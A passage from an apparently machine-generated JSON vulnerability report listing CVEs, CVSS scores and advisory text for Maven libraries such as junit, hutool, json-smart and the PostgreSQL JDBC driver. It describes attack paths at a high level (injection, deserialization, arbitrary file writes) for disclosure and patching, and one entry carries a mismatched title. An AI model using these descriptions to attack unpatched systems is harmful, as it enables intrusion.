CI/CD environments but normally won't be 'yes' for personal developer machines._   - If yes, and you answered 'yes' to question 1, this vulnerability impacts you.   - If no, this vulnerability does not impact you.  ### Patches  Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.  - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1.  - Java 1.6 and lower users: **no patch is available, you must use the workaround below.**  ### Workarounds  If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.  ### References - [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) - Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae  #### Similar Vulnerabilities  - Google Guava - https://github.com/google/guava/issues/4011  - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945  - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824  ### For more information If you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues)."}],"product_status":{"known_affected":["junit/junit@vers:maven/>=4.7|<4.13.1"],"known_not_affected":["junit/junit@4.13.1"]},"references":[{"summary":"GitHub Advisory GHSA-269g-pwp5-87pp","url":"https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp"},{"summary":"Junit Advisory TemporaryFolder","url":"https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01110833b63616ddbef59ae4e10c0fbd0060f0a51206defd4cb4d917@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r09cfbb5aedd76023691bbce9ca4ce2e16bb07dd37554a17efc19935d@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1209986f79359b518d09513ff05a88e5b3c398540e775edea76a4774@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r29d703d1986d9b871466ff24082a1828ac8ad27bb0965a93a383872e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b78f23bc2711a76a7fc73ad67b7fcd6817c5cfccefd6f30a4f54943@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r30f502d2f79e8d635361adb8108dcbb73095163fcbd776ee7984a094@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r500517c23200fb2fdb0b82770a62dd6c88b3521cfb01cfd0c76e3f8b@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8841507576f595bb783ccec6a7cb285ea90d4e6f5043eae0e61a41@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r687f489b10b0d14e46f626aa88476545e1a2600b24c4ebd3c0d2a10b@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r717877028482c55acf604d7a0106af4ca05da4208c708fb157b53672@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742b44fd75215fc75963b8ecc22b2e4372e68d67d3d859d2b5e8743f@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8b02dc6f18df11ff39eedb3038f1e31e6f90a779b1959bae65107279@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r925eaae7dd8f77dd61eefc49c1fcf54bd9ecfe605486870d7b1e9390@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r934208a520b38f5cf0cae199b6b076bfe7d081809528b0eff2459e40@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95f8ef60c4b3a5284b647bb3132cda08e6fadad888a66b84f49da0b0@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9710067c7096b83cb6ae8f53a2f6f94e9c042d1bf1d6929f8f2a2b7a@%3Ccommits.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra1bdb9efae84794e8ffa2f8474be8290ba57830eefe9714b95da714b@%3Cdev.pdfbox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raebf13f53cd5d23d990712e3d11c80da9a7bae94a6284050f148ed99@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2771949c676ca984e58a5cd5ca79c2634dee1945e0406e48e0f8457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2ffe2993f4dccc48d832e1a0f1c419477781b6ea16e725ca2276dbb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbaec90e699bc7c7bd9a053f76707a36fda48b6d558f31dc79147dbf9@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc49cf1547ef6cac1be4b3c92339b2cae0acacf5acaba13cfa429a872@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdbdd30510a7c4d0908fd22075c02b75bbc2e0d977ec22249ef3133cb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde385b8b53ed046600ef68dd6b4528dea7566aaddb02c3e702cc28bc@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde8e70b95c992378e8570e4df400c6008a9839eabdfb8f800a3e5af6@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdef7d1380c86e7c0edf8a0f89a2a8db86fce5e363457d56b722691b4@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea812d8612fdc46842a2a57248cad4b01ddfdb1e9b037c49e68fdbfb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reb700e60b9642eafa4b7922bfee80796394135aa09c7a239ef9f7486@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf2ec93f4ca9a97d1958eb4a31b1830f723419ce9bf2018a6e5741d5b@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6e5d894d4b03bef537c9d6641272e0197c047c0d1982b4e176d0353@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf797d119cc3f51a8d7c3c5cbe50cb4524c8487282b986edde83a9467@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00003.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.4,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.4,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.4,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["junit/junit@vers:maven/>=4.7|<4.13.1"]}],"title":"CVE-2020-15250/pkg:maven/junit/junit@4.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24163"]}],"cve":"CVE-2023-24163","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24163"},{"system_name":"Gitee Advisory","text":"I6AJWJ"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara hutool vulnerable to SQL Injection"},{"category":"details","details":"Vulnerability Details","text":"# Dromara hutool vulnerable to SQL Injection SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"],"known_not_affected":["cn.hutool/hutool-all@5.8.21"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868"},{"summary":"Gitee Advisory I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"]}],"title":"CVE-2023-24163/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24162"]}],"cve":"CVE-2023-24162","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24162"},{"system_name":"Gitee Advisory","text":"I6AEX2"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara Hutool Deserialization of Untrusted Data vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Dromara Hutool Deserialization of Untrusted Data vulnerability Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory I6AEX2","url":"https://gitee.com/dromara/hutool/issues/I6AEX2"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]}],"title":"CVE-2023-24162/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-51074"]}],"cve":"CVE-2023-51074","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2023-12-27T21:31:01","ids":[{"system_name":"CVE Record","text":"CVE-2023-51074"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-path Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# json-path Out-of-bounds Write vulnerability json-path v2.8.0 was discovered to contain a stack overflow via the `Criteria.parse()` method."}],"product_status":{"known_affected":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"],"known_not_affected":["com.jayway.jsonpath/json-path@2.9.0"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"]}],"title":"CVE-2023-51074/pkg:maven/com.jayway.jsonpath/json-path@2.2.0?type=jar"},{"cve":"CVE-2023-1370","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-23T20:32:03","ids":[{"system_name":"CVE Record","text":"CVE-2023-1370"},{"system_name":"GitHub Advisory","text":"GHSA-493p-pfq6-5258"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-NETMINIDEV-3369748"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"JFrog Advisory","text":"stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-smart Uncontrolled Recursion vulnerabilty"},{"category":"details","details":"Vulnerability Details","text":"# json-smart Uncontrolled Recursion vulnerabilty ### Impact Affected versions of [net.minidev:json-smart](https://github.com/netplex/json-smart-v1) are vulnerable to Denial of Service (DoS) due to a StackOverflowError when parsing a deeply nested JSON array or object.  When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively. It was discovered that the 3PP does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause stack exhaustion (stack overflow) and crash the software.  ### Patches This vulnerability was fixed in json-smart version 2.4.9, but the maintainer recommends upgrading to 2.4.10, due to a remaining bug.  ### Workarounds N/A  ### References - https://www.cve.org/CVERecord?id=CVE-2023-1370 - https://nvd.nist.gov/vuln/detail/CVE-2023-1370 - https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"],"known_not_affected":["net.minidev/json-smart@2.4.10"]},"references":[{"summary":"GitHub Advisory GHSA-493p-pfq6-5258","url":"https://github.com/oswaldobapvicjr/jsonmerge/security/advisories/GHSA-493p-pfq6-5258"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"JFrog Advisory stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633","url":"https://research.jfrog.com/vulnerabilities/stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Snyk Advisory SNYK-JAVA-NETMINIDEV-3369748","url":"https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"},{"summary":"Cve 2023","url":"https://www.cve.org/CVERecord?id=CVE-2023-1370"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"]}],"title":"CVE-2023-1370/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-27568"]}],"cve":"CVE-2021-27568","cwe":{"id":"754","name":"Improper Check for Unusual or Exceptional Conditions"},"discovery_date":"2021-06-16T18:03:47","ids":[{"system_name":"CVE Record","text":"CVE-2021-27568"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Check for Unusual or Exceptional Conditions in json-smart"},{"category":"details","details":"Vulnerability Details","text":"# Improper Check for Unusual or Exceptional Conditions in json-smart An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information."}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"],"known_not_affected":["net.minidev/json-smart@2.3.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6@%3Ccommits.druid.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"]}],"title":"CVE-2021-27568/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41946"]}],"cve":"CVE-2022-41946","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T22:17:25","ids":[{"system_name":"CVE Record","text":"CVE-2022-41946"},{"system_name":"GitHub Advisory","text":"GHSA-562r-vg33-8x8h"},{"system_name":"NetApp Advisory","text":"ntap-20240329-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files **Vulnerability**  `PreparedStatement.setText(int, InputStream)` and  `PreparedStatemet.setBytea(int, InputStream)`  will create a temporary file if the InputStream is larger than 51k    Example of vulnerable code:  ```java String s = \"some very large string greater than 51200 bytes\";  PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) ); ``` This will create a temporary file which is readable by other users on Unix like systems, but not MacOS.  Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.  This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.  When analyzing the impact of this vulnerability, here are the important questions to ask:  Is the driver running in an environment where the OS has other untrusted users. If yes, and you answered 'yes' to question 1, this vulnerability impacts you. If no, this vulnerability does not impact you. Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.  Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1 Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7 Java 1.6 and lower users: no patch is available; you must use the workaround below. Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.  References [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) Fix commit https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5 Similar Vulnerabilities Google Guava - https://github.com/google/guava/issues/4011 Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824  ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-41946, CVE-2022-41946"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"],"known_not_affected":["org.postgresql/postgresql@42.3.8"]},"references":[{"summary":"GitHub Advisory GHSA-562r-vg33-8x8h","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"NetApp Advisory ntap-20240329-0003","url":"https://security.netapp.com/advisory/ntap-20240329-0003"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.7,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"]}],"title":"CVE-2022-41946/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-26520"]}],"cve":"CVE-2022-26520","discovery_date":"2022-03-11T00:02:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-26520"},{"system_name":"GitHub Advisory","text":"GHSA-673j-qm5f-xpv8"},{"system_name":"Postgresql Advisory","text":"changelog"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"Postgresql Advisory","text":"tomcat"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Path traversal in org.postgresql:postgresql"},{"category":"details","details":"Vulnerability Details","text":"# Path traversal in org.postgresql:postgresql In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.  ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-26520, CVE-2022-26520"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"],"known_not_affected":["org.postgresql/postgresql@42.3.3"]},"references":[{"summary":"GitHub Advisory GHSA-673j-qm5f-xpv8","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8"},{"summary":"Postgresql Advisory changelog","url":"https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3"},{"summary":"Postgresql Advisory tomcat","url":"https://jdbc.postgresql.org/documentation/head/tomcat.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26520"},{"summary":"Debian Advisory dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.1,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.1,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.1,"temporalSeverity":"LOW","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.1.0|<42.3.3"]}],"title":"CVE-2022-26520/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-31197"]}],"cve":"CVE-2022-31197","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2022-08-06T05:51:38","ids":[{"system_name":"CVE Record","text":"CVE-2022-31197"},{"system_name":"GitHub Advisory","text":"GHSA-r38f-c4h4-hqq2"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names"},{"category":"details","details":"Vulnerability Details","text":"# PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names ### Impact _What kind of vulnerability is it? Who is impacted?_  The 